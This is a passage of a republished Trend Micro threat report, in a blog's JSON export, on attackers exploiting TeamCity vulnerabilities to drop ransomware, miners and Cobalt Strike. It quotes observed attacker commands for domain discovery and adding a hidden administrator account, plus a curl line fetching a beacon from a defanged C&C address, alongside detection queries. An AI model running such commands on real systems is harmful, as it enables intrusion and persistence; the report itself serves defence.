{"id":55639,"date":"2024-03-19T00:00:00","date_gmt":"2024-03-19T00:00:00","guid":{"rendered":"urn:uuid:62b5e06b-6ac6-3465-a2d5-fe105d4d13be"},"modified":"2024-03-19T00:00:00","modified_gmt":"2024-03-19T00:00:00","slug":"teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/","title":{"rendered":"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/teamcity-cover:Large?qlt=80\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/24\/teamcity-cover.png\" class=\"ff-og-image-inserted\"><\/div>\n<p><span class=\"body-subhead-title\">Executing domain discovery and persistence commands<\/span><\/p>\n<p>Aside from malware deployment, we have also seen several attempts to discover network infrastructure and employ persistence commands arising from the <i>java.exe<\/i> process under a vulnerable TeamCity server directory.<\/p>\n<p><b>Parent Process:<\/b><br \/><span class=\"blockquote\">C:\\TeamCity\\jre\\bin\\java.exe<\/span><\/p>\n<p>We observed the following subject processes being used for discovery and persistence tactics:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net.exe&nbsp; group \/domain<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net1.exe localgroup Administratoren \/add Default$<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net1.exe localgroup Administrators \/add Default$<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net1.exe user \/add Default$ GH{redacted}23gwg<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net1.exe user \/del defaultuser0<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net1.exe user \/domain<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net1.exe user administrator<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\net1.exe user default$<\/span><\/li>\n<li><span class=\"rte-red-bullet\">C:\\WINDOWS\\system32\\nltest.exe&nbsp; \/domain_trusts<\/span><\/li>\n<\/ul>\n<p>Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorized access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.<\/p>\n<p><span class=\"body-subhead-title\">Deploying Cobalt Strike beacons<br \/><\/span><br \/>Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (<i>SHA1: db6bd96b152314db3c430df41b83fcf2e5712281<\/i>) was deployed.<\/p>\n<p>The beacon was downloaded using the command <i>curl&nbsp; hxxp:\/\/83[.]97[.]20[.]141:81\/beacon.out -o .conf<\/i> and was saved in the path <i>C:\\TeamCity\\bin\\.conf<\/i>.<\/p>\n<p>This was detected by the Trend Pattern <b>Backdoor.Linux.COBEACON.SMYXDKV<\/b>. The beacon reaches out to the C&amp;C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.<\/p>\n<h2><span class=\"body-subhead-title\">Conclusion<\/span><\/h2>\n<p>The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organizations relying on this platform for their CI\/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.<\/p>\n<p>This malicious activity not only jeopardizes the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organizations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.<\/p>\n<p>The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.<\/p>\n<h2><span class=\"body-subhead-title\"><\/span><\/h2>\n<ul>\n<li><span class=\"rte-red-bullet\">43957 \u2013 HTTP: JetBrains TeamCity Directory Traversal Vulnerability<\/span><\/li>\n<li><span class=\"rte-red-bullet\">43958 \u2013 HTTP: JetBrains TeamCity Authentication Bypass Vulnerability<\/span><\/li>\n<\/ul>\n<h2><span class=\"body-subhead-title\"><\/span><\/h2>\n<ul>\n<li><span class=\"rte-red-bullet\">5011 \u2013 CVE-2024-27198 \u2013 JetBrains TeamCity Auth Bypass Exploit \u2013 HTTP (Response)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">5012 \u2013 CVE-2024-27199 \u2013 JetBrains TeamCity Directory Traversal Exploit \u2013 HTTP (Response)<\/span><\/li>\n<\/ul>\n<h2><span class=\"body-subhead-title\"><\/span><\/h2>\n<ul>\n<li><span class=\"rte-red-bullet\">1011995 \u2013 JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">1011996 \u2013 JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)<\/span><\/li>\n<\/ul>\n<h2><span class=\"body-subhead-title\"><\/span><\/h2>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"10\">\n<tr>\n<th scope=\"col\">Description<\/th>\n<th scope=\"col\">Trend Vision One Query<\/th>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"24\" width=\"197\">Jasmin ransomware file encryption event<\/td>\n<td width=\"197\">eventSubId:101 AND processFilePath:abc.exe AND objectFilePath:.lsoc<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"24\" width=\"197\">Service Installation of the Monero miner\u2019s dropped Kernel driver as seen from the registry<\/td>\n<td width=\"197\">eventSubId:402 and tags:XSAE.F7460 and objectRegistryData:WinRing0x64.sys<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"24\" width=\"197\">Decoding of encrypted components dropped by the Monero miner MSI package through certutil.exe<\/td>\n<td width=\"197\">eventSubId:2 and processCmd:IndexStore.bat and objectCmd:(&#8220;certutil&#8221; and &#8220;decode&#8221;)<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"24\" width=\"197\">Execution of the SparkRAT malware from the batch file<\/td>\n<td width=\"197\">eventSubId:2 and processFilePath:cmd.exe and processCmd:win.bat and objectCmd:windowDefenSrv<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"24\" width=\"197\">Detection of suspicious process invocations from a TeamCity process<\/td>\n<td width=\"197\">eventSubId:2 AND processCmd:TeamCity AND objectCmd:(&#8220;powershell&#8221; OR &#8220;net&#8221; OR &#8220;nltest&#8221; OR &#8220;msiexec&#8221;)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/c\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVE-2024-27198 and CVE-2024-27199 are vulnerabilities within the TeamCity On-Premises platform that can allow attackers to gain administrative control over affected systems. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":55640,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9508,9555,9513,9539,9509],"class_list":["post-55639","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-malware","tag-trend-micro-research-ransomware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-03-19T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/teamcity-cover:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types\",\"datePublished\":\"2024-03-19T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/\"},\"wordCount\":582,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Ransomware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/\",\"name\":\"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png\",\"datePublished\":\"2024-03-19T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png\",\"width\":976,\"height\":533},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/","og_locale":"en_US","og_type":"article","og_title":"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-03-19T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/teamcity-cover:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types","datePublished":"2024-03-19T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/"},"wordCount":582,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/03\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Malware","Trend Micro Research : Ransomware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/","url":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/","name":"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/03\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png","datePublished":"2024-03-19T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/03\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/03\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types.png","width":976,"height":533},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware-other-malware-types\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/55639","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=55639"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/55639\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/55640"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=55639"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=55639"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=55639"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}